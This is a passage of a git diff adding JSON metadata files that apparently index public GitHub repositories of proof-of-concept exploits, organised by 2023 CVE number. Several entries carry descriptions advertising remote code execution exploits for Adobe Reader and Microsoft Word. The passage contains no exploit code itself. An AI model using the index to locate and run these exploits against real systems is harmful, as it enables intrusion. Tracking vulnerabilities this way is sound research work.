"Trinadh465\/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272", + "description": null, + "fork": false, + "created_at": "2023-09-26T10:28:51Z", + "updated_at": "2023-09-26T10:36:04Z", + "pushed_at": "2023-09-26T10:36:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 700750193, + "name": "platform_frameworks_base_AOSP_10_r33_CVE-2023-21272", + "full_name": "pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272", + "description": null, + "fork": false, + "created_at": "2023-10-05T08:13:35Z", + "updated_at": "2023-10-05T08:21:14Z", + "pushed_at": "2023-10-05T08:20:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21275.json b/2023/CVE-2023-21275.json new file mode 100644 index 0000000000..c358d8f301 --- /dev/null +++ b/2023/CVE-2023-21275.json @@ -0,0 +1,33 @@ +[ + { + "id": 700806018, + "name": "packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275", + "full_name": "Trinadh465\/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275", + "description": null, + "fork": false, + "created_at": "2023-10-05T10:30:41Z", + "updated_at": "2023-10-05T10:32:25Z", + "pushed_at": "2023-10-05T10:32:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21281.json b/2023/CVE-2023-21281.json new file mode 100644 index 0000000000..c3f7484868 --- /dev/null +++ b/2023/CVE-2023-21281.json @@ -0,0 +1,33 @@ +[ + { + "id": 699780067, + "name": "platform_frameworks_base_CVE-2023-21281", + "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21281", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21281", + "description": null, + "fork": false, + "created_at": "2023-10-03T10:23:48Z", + "updated_at": "2023-10-03T10:32:15Z", + "pushed_at": "2023-10-03T10:31:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21282.json b/2023/CVE-2023-21282.json new file mode 100644 index 0000000000..2df78293f1 --- /dev/null +++ b/2023/CVE-2023-21282.json @@ -0,0 +1,64 @@ +[ + { + "id": 700249234, + "name": "external_aac_AOSP10_r33_CVE-2023-21282", + "full_name": "Trinadh465\/external_aac_AOSP10_r33_CVE-2023-21282", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_aac_AOSP10_r33_CVE-2023-21282", + "description": null, + "fork": false, + "created_at": "2023-10-04T08:31:10Z", + "updated_at": "2023-10-04T08:33:06Z", + "pushed_at": "2023-10-04T08:33:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774784509, + "name": "external_aac_android-4.2.2_r1_CVE-2023-21282", + "full_name": "Trinadh465\/external_aac_android-4.2.2_r1_CVE-2023-21282", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_aac_android-4.2.2_r1_CVE-2023-21282", + "description": null, + "fork": false, + "created_at": "2024-03-20T07:15:49Z", + "updated_at": "2024-03-20T07:18:33Z", + "pushed_at": "2024-03-20T07:18:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21284.json b/2023/CVE-2023-21284.json new file mode 100644 index 0000000000..baf36109c3 --- /dev/null +++ b/2023/CVE-2023-21284.json @@ -0,0 +1,33 @@ +[ + { + "id": 700773248, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21284", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21284", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21284", + "description": null, + "fork": false, + "created_at": "2023-10-05T09:10:47Z", + "updated_at": "2023-10-05T09:22:59Z", + "pushed_at": "2023-10-05T09:22:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21285.json b/2023/CVE-2023-21285.json new file mode 100644 index 0000000000..19b9714b83 --- /dev/null +++ b/2023/CVE-2023-21285.json @@ -0,0 +1,33 @@ +[ + { + "id": 728564763, + "name": "framework_base_CVE-2023-21285_NoPatch", + "full_name": "uthrasri\/framework_base_CVE-2023-21285_NoPatch", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/framework_base_CVE-2023-21285_NoPatch", + "description": null, + "fork": false, + "created_at": "2023-12-07T08:03:03Z", + "updated_at": "2023-12-11T18:17:37Z", + "pushed_at": "2023-12-07T09:13:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21286.json b/2023/CVE-2023-21286.json new file mode 100644 index 0000000000..2a28515d00 --- /dev/null +++ b/2023/CVE-2023-21286.json @@ -0,0 +1,33 @@ +[ + { + "id": 699793027, + "name": "platform_frameworks_base_CVE-2023-21286", + "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21286", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21286", + "description": null, + "fork": false, + "created_at": "2023-10-03T10:58:51Z", + "updated_at": "2023-10-03T11:06:54Z", + "pushed_at": "2023-10-03T11:06:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21288.json b/2023/CVE-2023-21288.json new file mode 100644 index 0000000000..7caf402e2d --- /dev/null +++ b/2023/CVE-2023-21288.json @@ -0,0 +1,33 @@ +[ + { + "id": 700206219, + "name": "platform_frameworks_base_CVE-2023-21288", + "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-21288", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-21288", + "description": null, + "fork": false, + "created_at": "2023-10-04T06:42:19Z", + "updated_at": "2023-10-04T06:48:34Z", + "pushed_at": "2023-10-04T07:10:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21537.json b/2023/CVE-2023-21537.json new file mode 100644 index 0000000000..0ba52adb3b --- /dev/null +++ b/2023/CVE-2023-21537.json @@ -0,0 +1,33 @@ +[ + { + "id": 910730197, + "name": "CVE-2023-21537", + "full_name": "stevenjoezhang\/CVE-2023-21537", + "owner": { + "login": "stevenjoezhang", + "id": 16272760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16272760?v=4", + "html_url": "https:\/\/github.com\/stevenjoezhang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stevenjoezhang\/CVE-2023-21537", + "description": null, + "fork": false, + "created_at": "2025-01-01T08:17:26Z", + "updated_at": "2025-01-01T08:17:32Z", + "pushed_at": "2025-01-01T08:17:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21554.json b/2023/CVE-2023-21554.json new file mode 100644 index 0000000000..57860d7700 --- /dev/null +++ b/2023/CVE-2023-21554.json @@ -0,0 +1,95 @@ +[ + { + "id": 642331320, + "name": "CVE-2023-21554-PoC", + "full_name": "zoemurmure\/CVE-2023-21554-PoC", + "owner": { + "login": "zoemurmure", + "id": 43516782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43516782?v=4", + "html_url": "https:\/\/github.com\/zoemurmure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zoemurmure\/CVE-2023-21554-PoC", + "description": "CVE-2023-21554 Windows MessageQueuing PoC,分析见 https:\/\/www.zoemurmure.top\/posts\/cve_2023_21554\/", + "fork": false, + "created_at": "2023-05-18T10:30:49Z", + "updated_at": "2025-01-05T23:28:20Z", + "pushed_at": "2023-05-18T10:38:57Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 56, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 679812800, + "name": "CVE-2023-21554", + "full_name": "3tternp\/CVE-2023-21554", + "owner": { + "login": "3tternp", + "id": 26215963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26215963?v=4", + "html_url": "https:\/\/github.com\/3tternp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3tternp\/CVE-2023-21554", + "description": null, + "fork": false, + "created_at": "2023-08-17T17:16:46Z", + "updated_at": "2024-12-10T07:00:42Z", + "pushed_at": "2023-08-21T21:22:40Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 904027205, + "name": "CVE-2023-21554", + "full_name": "Rahul-Thakur7\/CVE-2023-21554", + "owner": { + "login": "Rahul-Thakur7", + "id": 69378114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69378114?v=4", + "html_url": "https:\/\/github.com\/Rahul-Thakur7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rahul-Thakur7\/CVE-2023-21554", + "description": null, + "fork": false, + "created_at": "2024-12-16T05:39:53Z", + "updated_at": "2024-12-16T05:40:26Z", + "pushed_at": "2024-12-16T05:40:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21560.json b/2023/CVE-2023-21560.json new file mode 100644 index 0000000000..3a6d1c4eb5 --- /dev/null +++ b/2023/CVE-2023-21560.json @@ -0,0 +1,44 @@ +[ + { + "id": 811928581, + "name": "dubiousdisk", + "full_name": "Wack0\/dubiousdisk", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/dubiousdisk", + "description": "The Porygon-Z that's super effective against Secure Boot! (CVE-2022-30203, CVE-2023-21560, CVE-2023-28269, CVE-2023-28249, and more...)", + "fork": false, + "created_at": "2024-06-07T15:25:33Z", + "updated_at": "2024-10-09T02:12:28Z", + "pushed_at": "2024-06-07T15:26:02Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bitlocker", + "cve-2022-30203", + "cve-2023-21560", + "cve-2023-28249", + "cve-2023-28269", + "secure-boot", + "uefi", + "vulnerability", + "windows-boot", + "writeup" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21608.json b/2023/CVE-2023-21608.json new file mode 100644 index 0000000000..08dcd54624 --- /dev/null +++ b/2023/CVE-2023-21608.json @@ -0,0 +1,83 @@ +[ + { + "id": 595125010, + "name": "CVE-2023-21608", + "full_name": "hacksysteam\/CVE-2023-21608", + "owner": { + "login": "hacksysteam", + "id": 4098538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4098538?v=4", + "html_url": "https:\/\/github.com\/hacksysteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacksysteam\/CVE-2023-21608", + "description": "Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit", + "fork": false, + "created_at": "2023-01-30T12:57:48Z", + "updated_at": "2025-01-06T16:14:58Z", + "pushed_at": "2023-12-05T12:21:02Z", + "stargazers_count": 269, + "watchers_count": 269, + "has_discussions": false, + "forks_count": 57, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "adobe", + "adobe-reader", + "aslr-bypass", + "cfg-bypass", + "cve-2023-21608", + "dep-bypass", + "exploit", + "rce", + "use-after-free" + ], + "visibility": "public", + "forks": 57, + "watchers": 269, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 600993696, + "name": "CVE-2023-21608", + "full_name": "Malwareman007\/CVE-2023-21608", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-21608", + "description": "Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit", + "fork": false, + "created_at": "2023-02-13T06:11:40Z", + "updated_at": "2023-11-09T09:44:56Z", + "pushed_at": "2023-02-13T09:03:19Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "adobe", + "adobe-reader", + "aslr-bypass", + "cfg-bypass", + "cve-2023-21608", + "dep-bypass", + "rce", + "use-after-free" + ], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2163.json b/2023/CVE-2023-2163.json new file mode 100644 index 0000000000..95eea893b0 --- /dev/null +++ b/2023/CVE-2023-2163.json @@ -0,0 +1,33 @@ +[ + { + "id": 895141993, + "name": "CVE-2023-2163", + "full_name": "letsr00t\/CVE-2023-2163", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/CVE-2023-2163", + "description": null, + "fork": false, + "created_at": "2024-11-27T16:25:48Z", + "updated_at": "2024-11-27T16:26:40Z", + "pushed_at": "2024-11-27T16:26:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21674.json b/2023/CVE-2023-21674.json new file mode 100644 index 0000000000..559fa10c88 --- /dev/null +++ b/2023/CVE-2023-21674.json @@ -0,0 +1,33 @@ +[ + { + "id": 768456651, + "name": "CVE-2023-21674", + "full_name": "hd3s5aa\/CVE-2023-21674", + "owner": { + "login": "hd3s5aa", + "id": 160862061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160862061?v=4", + "html_url": "https:\/\/github.com\/hd3s5aa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hd3s5aa\/CVE-2023-21674", + "description": null, + "fork": false, + "created_at": "2024-03-07T05:43:48Z", + "updated_at": "2024-11-21T05:26:33Z", + "pushed_at": "2024-04-05T00:05:44Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21707.json b/2023/CVE-2023-21707.json new file mode 100644 index 0000000000..2474690678 --- /dev/null +++ b/2023/CVE-2023-21707.json @@ -0,0 +1,33 @@ +[ + { + "id": 660576520, + "name": "CVE-2023-21707", + "full_name": "N1k0la-T\/CVE-2023-21707", + "owner": { + "login": "N1k0la-T", + "id": 72502573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72502573?v=4", + "html_url": "https:\/\/github.com\/N1k0la-T", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N1k0la-T\/CVE-2023-21707", + "description": "CVE-2023-21707 EXP", + "fork": false, + "created_at": "2023-06-30T10:15:07Z", + "updated_at": "2024-08-25T15:38:45Z", + "pushed_at": "2023-07-06T07:43:24Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21716.json b/2023/CVE-2023-21716.json new file mode 100644 index 0000000000..fda120de09 --- /dev/null +++ b/2023/CVE-2023-21716.json @@ -0,0 +1,312 @@ +[ + { + "id": 610690231, + "name": "CVE-2023-21716", + "full_name": "FeatherStark\/CVE-2023-21716", + "owner": { + "login": "FeatherStark", + "id": 42148584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42148584?v=4", + "html_url": "https:\/\/github.com\/FeatherStark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FeatherStark\/CVE-2023-21716", + "description": null, + "fork": false, + "created_at": "2023-03-07T09:34:12Z", + "updated_at": "2024-06-20T18:43:22Z", + "pushed_at": "2023-03-07T09:35:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 610826985, + "name": "CVE-2023-21716", + "full_name": "Xnuvers007\/CVE-2023-21716", + "owner": { + "login": "Xnuvers007", + "id": 62522733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62522733?v=4", + "html_url": "https:\/\/github.com\/Xnuvers007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xnuvers007\/CVE-2023-21716", + "description": "RTF Crash POC Python 3.11 Windows 10", + "fork": false, + "created_at": "2023-03-07T15:03:43Z", + "updated_at": "2024-09-03T19:57:00Z", + "pushed_at": "2023-03-07T15:17:47Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 48, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 611115173, + "name": "CVE-2023-21716", + "full_name": "gyaansastra\/CVE-2023-21716", + "owner": { + "login": "gyaansastra", + "id": 35690123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35690123?v=4", + "html_url": "https:\/\/github.com\/gyaansastra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gyaansastra\/CVE-2023-21716", + "description": "A vulnerability within Microsoft Office's wwlib allows attackers to achieve remote code execution with the privileges of the victim that opens a malicious RTF document. The attacker could deliver this file as an email attachment (or other means).", + "fork": false, + "created_at": "2023-03-08T06:20:45Z", + "updated_at": "2024-09-08T05:45:03Z", + "pushed_at": "2023-03-08T06:21:58Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 59, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 611392512, + "name": "CVE-2023-21716_YARA_Results", + "full_name": "mikesxrs\/CVE-2023-21716_YARA_Results", + "owner": { + "login": "mikesxrs", + "id": 12898100, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12898100?v=4", + "html_url": "https:\/\/github.com\/mikesxrs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mikesxrs\/CVE-2023-21716_YARA_Results", + "description": "Results of retrohunt for files matching YARA rules from https:\/\/github.com\/AmgdGocha\/Detection-Rules\/blob\/main\/CVE-2023-21716.yar", + "fork": false, + "created_at": "2023-03-08T18:25:39Z", + "updated_at": "2024-06-20T18:43:33Z", + "pushed_at": "2023-03-11T00:04:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612019137, + "name": "CVE-2023-21716-POC", + "full_name": "3yujw7njai\/CVE-2023-21716-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-21716-POC", + "description": "Microsoft Word 远程代码执行漏洞", + "fork": false, + "created_at": "2023-03-10T02:46:32Z", + "updated_at": "2024-06-20T18:43:17Z", + "pushed_at": "2023-03-10T02:48:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618503913, + "name": "CVE-2023-21716_exploit", + "full_name": "hv0l\/CVE-2023-21716_exploit", + "owner": { + "login": "hv0l", + "id": 61795418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61795418?v=4", + "html_url": "https:\/\/github.com\/hv0l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hv0l\/CVE-2023-21716_exploit", + "description": "test of exploit for CVE-2023-21716", + "fork": false, + "created_at": "2023-03-24T15:58:25Z", + "updated_at": "2024-08-09T20:17:43Z", + "pushed_at": "2023-03-24T16:00:42Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 628735666, + "name": "CVE-2023-21716", + "full_name": "JMousqueton\/CVE-2023-21716", + "owner": { + "login": "JMousqueton", + "id": 4148567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4148567?v=4", + "html_url": "https:\/\/github.com\/JMousqueton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JMousqueton\/CVE-2023-21716", + "description": "POC : CVE-2023-21716 Microsoft Word RTF Font Table Heap Corruption", + "fork": false, + "created_at": "2023-04-16T21:12:29Z", + "updated_at": "2024-09-19T21:32:04Z", + "pushed_at": "2023-04-16T21:16:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 653288165, + "name": "CVE-2023-21716", + "full_name": "Lord-of-the-IoT\/CVE-2023-21716", + "owner": { + "login": "Lord-of-the-IoT", + "id": 109588583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109588583?v=4", + "html_url": "https:\/\/github.com\/Lord-of-the-IoT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lord-of-the-IoT\/CVE-2023-21716", + "description": "python program to exploit CVE-2023-21716", + "fork": false, + "created_at": "2023-06-13T19:04:45Z", + "updated_at": "2023-07-04T08:47:54Z", + "pushed_at": "2023-06-13T19:04:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714215346, + "name": "CVE-2023-21716-EXPLOIT.py", + "full_name": "MojithaR\/CVE-2023-21716-EXPLOIT.py", + "owner": { + "login": "MojithaR", + "id": 127576267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127576267?v=4", + "html_url": "https:\/\/github.com\/MojithaR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MojithaR\/CVE-2023-21716-EXPLOIT.py", + "description": "This is an exploit file which is used to check CVE-2021-21716 vulnerability", + "fork": false, + "created_at": "2023-11-04T08:49:14Z", + "updated_at": "2024-08-23T04:10:50Z", + "pushed_at": "2023-11-05T12:23:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858182132, + "name": "CVE-2023-21716-POC", + "full_name": "RonF98\/CVE-2023-21716-POC", + "owner": { + "login": "RonF98", + "id": 181740430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181740430?v=4", + "html_url": "https:\/\/github.com\/RonF98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RonF98\/CVE-2023-21716-POC", + "description": "Proof Of Concept for CVE-2023-21716 Microsoft Word Heap Corruption", + "fork": false, + "created_at": "2024-09-16T13:04:45Z", + "updated_at": "2024-11-25T09:52:09Z", + "pushed_at": 